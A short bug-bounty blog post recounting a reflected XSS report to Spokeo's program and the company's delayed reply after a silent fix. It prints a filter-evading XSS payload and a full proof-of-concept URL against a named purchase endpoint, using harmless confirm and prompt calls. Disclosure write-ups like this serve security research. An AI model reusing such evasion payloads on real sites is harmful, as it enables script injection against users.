Spokeo Bug Bounty Experience

Recently I reported an XSS bug to the Spokeo bug bounty program.

I don’t want to blame the company; sometimes we face things like this.

Program : https://www.spokeo.com/security

XSS Payload:
"'--!></Script%0C><Script%0C>confirm(1)</Script/%0C>#

Endpoint: All purchase types -> "/purchase?addr_num=6&q=6+130th+Ave+SE,+Bellevue,+WA+98005'&type=inject" parameter

XSS POC:

https://www.spokeo.com/purchase?addr_num=6&q=6+130th+Ave+SE,+Bellevue,+WA+98005'&type=address""'--!></Script%0C><Script%0C>prompt(document.domain)</Script/%0C>&url=/WA/Bellevue/6-130th-Ave-SE'

PoC:

After reporting, I waited and checked regularly for a fix or any reply, but there was no response. After 9 days I checked and the XSS had been fixed. Then I messaged them again to say the issue had been fixed. Then they replied :(

Reply:

Shocking response!

Question is,

Why did you respond after the fix and 9 days later?

:(

Thanks for reading.

Happy hunting!